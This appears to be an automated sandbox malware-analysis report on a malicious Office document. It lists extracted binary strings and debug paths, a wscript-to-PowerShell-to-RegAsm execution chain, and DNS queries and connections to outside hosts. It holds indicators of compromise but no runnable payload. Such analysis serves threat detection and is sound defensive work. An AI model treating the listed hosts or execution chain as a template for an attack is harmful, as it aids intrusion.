            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: find.pdb source: RegAsm.exe, 0000000B.00000002.466574369.000000000052D000.00000004.00000020.00020000.00000000.sdmp, wfbjvizcWo.exe, 0000000C.00000002.620877764.0000000000654000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: wfbjvizcWo.exe, 0000000C.00000002.620770237.00000000000FE000.00000002.00000001.01000000.00000008.sdmp, wfbjvizcWo.exe, 0000000E.00000000.479928036.00000000000FE000.00000002.00000001.01000000.00000008.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: find.pdbN source: RegAsm.exe, 0000000B.00000002.466574369.000000000052D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp

            Software Vulnerabilities

            barindex
            Document exploit detected (process start blacklist hit)
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            Suspicious execution chain found
            Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            Source: global trafficDNS query: name: jiourl.com
            Source: global trafficDNS query: name: jiourl.com
            Source: global trafficDNS query: name: jiourl.com
            Source: global trafficDNS query: name: jiourl.com
            Source: global trafficDNS query: name: jiourl.com
            Source: global trafficDNS query: name: jiourl.com
            Source: global trafficDNS query: name: ia803104.us.archive.org
            Source: global trafficDNS query: name: www.magicface.shop
            Source: global trafficDNS query: name: www.sqlite.org
            Source: global trafficDNS query: name: www.gymuniversity.net
            Source: global trafficDNS query: name: www.2886080.xyz
            Source: global trafficDNS query: name: www.jnnotary.org
            Source: global trafficDNS query: name: www.jnnotary.org
            Source: global trafficDNS query: name: www.jnnotary.org
            Source: global trafficDNS query: name: www.jnnotary.org
            Source: global trafficDNS query: name: www.kcrkimya.xyz
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
